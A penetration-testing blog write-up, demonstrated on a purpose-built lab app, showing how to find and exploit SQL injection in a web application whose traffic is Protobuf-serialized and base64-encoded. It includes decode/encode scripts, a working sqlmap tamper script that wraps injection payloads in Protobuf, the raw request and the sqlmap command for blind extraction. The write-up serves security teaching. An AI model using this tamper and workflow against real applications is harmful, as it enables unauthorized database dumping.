brodobuf

TL;DR

Many developers believe that serializing traffic makes a web application more secure, as well as faster. That would be easy, right? The truth is that security implications remain if the backend code does not adopt adequate defensive measures, regardless of how data is exchanged between the client and server. In this article we will show you how serialization can’t stop an attacker if the web application is vulnerable at the root. During our activity the application was vulnerable to SQL injection; we will show how to exploit it when the communications are serialized with Protocol Buffers and how to write a sqlmap tamper for it.

Introduction

Hello friends… Hello friends… Here is 0blio and MrSaighnal, we didn’t want to leave all the space to our brother last, so we decided to do some hacking. During an activity on a web application we tripped over a weird target behavior: during HTTP interception the data appeared to be encoded in base64, but after decoding the response we noticed the data was in a binary format. Thanks to some information leakage (and also by taking a look at the application/grpc header) we understood that the application used a Protocol Buffers (Protobuf) implementation. Searching the internet we found little information about Protobuf and its exploitation methodology, so we decided to document our analysis process here. The penetration testing activity was under NDA, so in order to demonstrate how Protobuf works we developed an exploitable web application (APTortellini copyrighted 😊).

Protobuf primer

Protobuf is a data serialization format released by Google in 2008. Unlike other formats such as JSON and XML, Protobuf is not human friendly, because data is serialized in a binary format and sometimes encoded in base64 on top of that. Protobuf was developed to improve communication speed when used in conjunction with gRPC (more on that in a moment). It is a data exchange format originally developed for internal use and later released as an open source project (partially under the Apache 2.0 license). Protobuf can be used by applications written in various programming languages, such as C#, C++, Go, Objective-C, JavaScript, Java, etc. Protobuf is used, among other things, in combination with HTTP and RPC (Remote Procedure Calls) for local and remote client-server communication, in particular to describe the interfaces needed for this purpose. The resulting protocol suite is known by the acronym gRPC.

For more information regarding Protobuf our best advice is to read the official documentation.

Step 1 - Playing with Protobuf: Decoding

Okay, so… our application comes with a simple search form that allows searching for products within the database.

brodobuf0

Searching for “tortellini”, we obviously get that the amount is 1337 (badoom tsss):

brodobuf1

Inspecting the traffic with Burp we notice how search queries are sent towards the /search endpoint of the application:

request0

And that the response looks like this:

request1

At first glance, it might seem that the messages are simply base64 encoded. When we tried to decode them, though, we noticed that the traffic is in a binary format:

term0

elliot0

Inspecting it with xxd we can get a bit more information.

term1

To make it easier for us to decode base64 and deserialize Protobuf, we wrote this simple script:

#!/usr/bin/python3

import base64
from subprocess import run, PIPE

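while True:
    try:
        # Decode base64 first, then drop the 5-byte frame header
        decoded_bytes = base64.b64decode(input("Insert string: "))[5:]
        # protoc --decode_raw reads the message from stdin; no .proto file is needed
        process = run(['protoc', '--decode_raw'], stdout=PIPE, input=decoded_bytes)

        print("\n\033[94mResult:\033[0m")
        print(process.stdout.decode("utf-8").strip())
    except (KeyboardInterrupt, EOFError):
        break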

The script takes a base64-encoded string as input, decodes it, strips away the first 5 bytes (the message frame header: a one-byte flag followed by the four-byte big-endian length of the message, the same prefix our encoder builds in Step 2) and finally uses protoc (Protobuf’s own compiler) with the --decode_raw option to deserialize the message.
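To make the 5-byte prefix less mysterious, here is a minimal sketch that parses it instead of blindly slicing it off. It assumes the layout used by our encoder in Step 2 (one flag byte, then a 4-byte big-endian length) and a single frame per message; the function name split_grpc_frame and the sample payload are ours, made up for illustration.

```python
import base64
import struct


def split_grpc_frame(b64_message):
    """Decode a base64 message and split off its 5-byte frame header."""
    raw = base64.b64decode(b64_message)
    if len(raw) < 5:
        raise ValueError("message shorter than the 5-byte frame header")
    # Byte 0: flag byte; bytes 1-4: payload length as a big-endian unsigned int.
    flag, length = struct.unpack(">BI", raw[:5])
    payload = raw[5:5 + length]
    if len(payload) != length:
        raise ValueError("declared length does not match the payload size")
    return flag, payload


# Build a sample frame by hand (hypothetical payload) and split it again.
sample_payload = b"\x0a\x0atortellini"
sample = base64.b64encode(
    b"\x00" + struct.pack(">I", len(sample_payload)) + sample_payload
).decode("utf-8")

flag, payload = split_grpc_frame(sample)
print(flag, payload)
```

Checking the declared length against what actually arrived is a cheap way to notice when a body carries more than one frame, something the plain [5:] slice would silently pass on to protoc.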

Running the script with our input data and the returned output data we get the following output:

term2

As we can see, the request message contains two fields:

  • Field 1: String to be searched within the database.
  • Field 2: An integer that is always 0.

The response structure, instead, consists of a series of messages containing the objects found and their respective amounts.
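If protoc is not at hand, what --decode_raw does can be approximated in a few lines of Python. The sketch below only handles the two wire types we met here (varint and length-delimited). The sample bytes are hand-built and assume the request wraps the two fields in one nested message, as in the definition we write in Step 2; read_varint and decode_raw are our own helper names.

```python
def read_varint(buf, pos):
    """Read a base-128 varint starting at pos; return (value, next_pos)."""
    value = 0
    shift = 0
    while True:
        byte = buf[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        if not byte & 0x80:  # high bit clear: last byte of the varint
            return value, pos
        shift += 7


def decode_raw(buf):
    """Return (field_number, wire_type, value) tuples for one message level."""
    fields = []
    pos = 0
    while pos < len(buf):
        tag, pos = read_varint(buf, pos)
        field_number, wire_type = tag >> 3, tag & 0x07
        if wire_type == 0:  # varint
            value, pos = read_varint(buf, pos)
        elif wire_type == 2:  # length-delimited: strings, bytes, nested messages
            length, pos = read_varint(buf, pos)
            value = buf[pos:pos + length]
            pos += length
        else:
            raise ValueError(f"wire type {wire_type} not handled in this sketch")
        fields.append((field_number, wire_type, value))
    return fields


# Hypothetical request body (frame header already stripped): a nested message
# holding the search term in field 1 and the integer 0 in field 2.
inner = b"\x0a\x0atortellini\x10\x00"
outer = b"\x0a" + bytes([len(inner)]) + inner

nested = decode_raw(outer)[0][2]
print(decode_raw(nested))
```

Note that a length-delimited value is returned as raw bytes: without a .proto file there is no way to know whether it is a string or a nested message, which is why the nested level is decoded with a second call.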

Once we understood the structure of the messages and their content, the challenge was to write a definition file (.proto) that allows us to get the same kind of output.

Step 2 - Suffering with Protobuf: Encoding

After spending some time reading the Python documentation, and after some trial and error, we wrote a message definition similar to the one our target application presumably uses.

syntax = "proto2";
package searchAPI;

message Product {

        message Prod {
                required string name = 1;
                optional int32 quantity = 2;
        }

        repeated Prod product = 1;
}

The .proto file can be compiled with the following command:

protoc -I=. --python_out=. ./search.proto

As a result we got a library (search_pb2.py) that we can import in our code to serialize/deserialize our messages, as you can see in the imports of the script below (import search_pb2).

#!/usr/bin/python3

import struct
from base64 import b64encode
import search_pb2

def encode(array):
    """
    Function to serialize an array of tuples
    """
    products = search_pb2.Product()
    for tup in array:
        p = products.product.add()
        p.name = str(tup[0])
        p.quantity = int(tup[1])

    # Serialize, then prepend the frame header: 1 flag byte + 4-byte big-endian length
    serializedString = products.SerializeToString()
    serializedString = b64encode(b'\x00' + struct.pack(">I", len(serializedString)) + serializedString).decode("utf-8")

    return serializedString

test = encode([('tortellini', 0)])
print (test)

The output for the string “tortellini” is the same as our browser request, demonstrating that the encoding process worked properly.

term3
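For the curious, the bytes produced by the generated library can also be built by hand, which helps to see that there is no magic (and no security) in the format. This is a minimal sketch under the assumption that the message layout matches our search.proto; it only supports non-negative integers, and all helper names are ours.

```python
import base64
import struct


def encode_varint(value):
    """Encode a non-negative integer as a Protobuf base-128 varint."""
    out = bytearray()
    while True:
        low7 = value & 0x7F
        value >>= 7
        if value:
            out.append(low7 | 0x80)  # more bytes follow
        else:
            out.append(low7)
            return bytes(out)


def length_delimited(field_number, data):
    """Encode a wire type 2 field (string, bytes or nested message)."""
    return encode_varint((field_number << 3) | 2) + encode_varint(len(data)) + data


def varint_field(field_number, value):
    """Encode a wire type 0 field (non-negative integers only in this sketch)."""
    return encode_varint(field_number << 3) + encode_varint(value)


def encode_by_hand(name, quantity):
    """Build Product{product: [Prod{name, quantity}]} plus the 5-byte frame header."""
    prod = length_delimited(1, name.encode("utf-8")) + varint_field(2, quantity)
    message = length_delimited(1, prod)
    frame = b"\x00" + struct.pack(">I", len(message)) + message
    return base64.b64encode(frame).decode("utf-8")


print(encode_by_hand("tortellini", 0))
```

If the assumptions hold, the printed string should match what the encode function above returns for the same tuple.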

Step 3 - Discovering the injection

To discover the SQL injection vulnerability we opted for manual inspection. We decided to send a single quote (') in order to induce a server error. Analyzing the web application endpoint:

http://brodostore/search/PAYLOAD

we could guess that the SQL query is something similar to:

SELECT id, product, amount FROM products WHERE product LIKE '%PAYLOAD%';

This means that by injecting a single quote into the request we could induce the server to process a malformed query:

SELECT id, product, amount FROM products WHERE product LIKE '%'%';

which in turn produces a 500 server error. To check this manually we had to serialize our payload with the compiled Protobuf library and encode it in base64 before sending it. We used the script from Step 2, modifying the following line:

test = encode([("'", 0)])

After running the script we can see the following output:

term4

By sending the generated serialized string as payload to the vulnerable endpoint:

request2

the application returns an HTTP 500 error, indicating that the query has been broken:

request3
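The failure mode we guessed above is easy to reproduce locally. The sketch below uses an in-memory SQLite database as a stand-in (we do not know which engine or code the real backend used, so the table and both functions are assumptions) to show that the quote breaks a query built by string concatenation, while a parameterized query treats it as plain data no matter how it was serialized on the wire.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, product TEXT, amount INTEGER)")
conn.execute("INSERT INTO products (product, amount) VALUES ('tortellini', 1337)")


def search_vulnerable(term):
    # String concatenation: the decoded Protobuf field lands in the SQL text as-is.
    query = "SELECT id, product, amount FROM products WHERE product LIKE '%" + term + "%'"
    return conn.execute(query).fetchall()


def search_parameterized(term):
    # Bound parameter: the term is passed as data and is never parsed as SQL.
    query = "SELECT id, product, amount FROM products WHERE product LIKE ?"
    return conn.execute(query, ("%" + term + "%",)).fetchall()


print(search_vulnerable("tortellini"))
try:
    search_vulnerable("'")
except sqlite3.OperationalError as exc:
    # A web application would typically surface this as an HTTP 500.
    print("query broke:", exc)
print(search_parameterized("'"))
```

The point of the comparison is that the fix lives in the backend query, not in the transport format.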

Since we wanted to automate the dump process, sqlmap was a good candidate for this task because of its tamper scripting feature.

Step 4 - Coding the tamper

Once we understood the behaviour of the Protobuf encoding process, coding a sqlmap tamper was a piece of cake.

#!/usr/bin/env python

from lib.core.enums import PRIORITY

import base64
import struct
import search_pb2

__priority__ = PRIORITY.HIGHEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    retVal = payload

    if payload:
        # Instantiating objects
        products = search_pb2.Product()
        
        p = products.product.add()
        p.name = payload
        p.quantity = 1

        # Serializing the string
        serializedString = products.SerializeToString()
        serializedString = b'\x00' + struct.pack(">I",len(serializedString)) + serializedString

        # Encoding the serialized string in base64
        b64serialized = base64.b64encode(serializedString).decode("utf-8")
        retVal = b64serialized

    return retVal

To make it work we moved the tamper into the sqlmap tamper directory /usr/share/sqlmap/tamper/ along with the compiled Protobuf library.

Here is the logic behind how the tamper works:

logic0

Step 5 - Exploiting Protobuf - Control is an illusion

We intercepted the HTTP request and added an asterisk (*) to tell sqlmap where to inject the payload.

GET /search/* HTTP/1.1
Host: brodostore
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

anon0

After saving the request in the test.txt file, we ran sqlmap with the following command:

sqlmap -r test.txt --tamper brodobug --technique=BT --level=5 --risk=3

sqlmap0
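The B in --technique=BT stands for boolean-based blind (the T for time-based blind). To give an idea of what that means in practice, here is a toy sketch of the extraction loop: each character is recovered with a binary search that only ever receives yes/no answers. The oracle function is a local stand-in for one tampered HTTP request, and SECRET, its known length and the printable ASCII range are all assumptions made for the demo.

```python
SECRET = "tortellini"  # hypothetical value the attacker cannot read directly
request_count = 0


def oracle(position, threshold):
    """Stand-in for one HTTP round trip: is ord(secret[position]) > threshold?"""
    global request_count
    request_count += 1
    return ord(SECRET[position]) > threshold


def extract_char(position):
    """Binary search over printable ASCII using only yes/no answers."""
    low, high = 32, 126
    while low < high:
        mid = (low + high) // 2
        if oracle(position, mid):
            low = mid + 1  # character code is above mid
        else:
            high = mid  # character code is mid or below
    return chr(low)


recovered = "".join(extract_char(i) for i in range(len(SECRET)))
print(recovered, request_count)
```

Even with a binary search, every single character costs several requests, and each of them has to go through the tamper first.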

Why is it slow?

Unfortunately sqlmap is not able to understand the Protobuf-encoded responses. Because of that we decided to take the path of boolean-based blind SQL injection. In other words, we had to “bruteforce” the value of every character of every string we wanted to dump, relying on the different responses the application returns depending on whether the injected condition holds. This approach is really slow compared to other SQL injection techniques, but for this test case it was enough to show how to exploit web applications that implement Protobuf. In the future, between one plate of tortellini and another, we could decide to implement a mechanism that decodes the responses via the *.proto struct and then expand it to other attack paths… but for now we are satisfied with that! Until next time folks!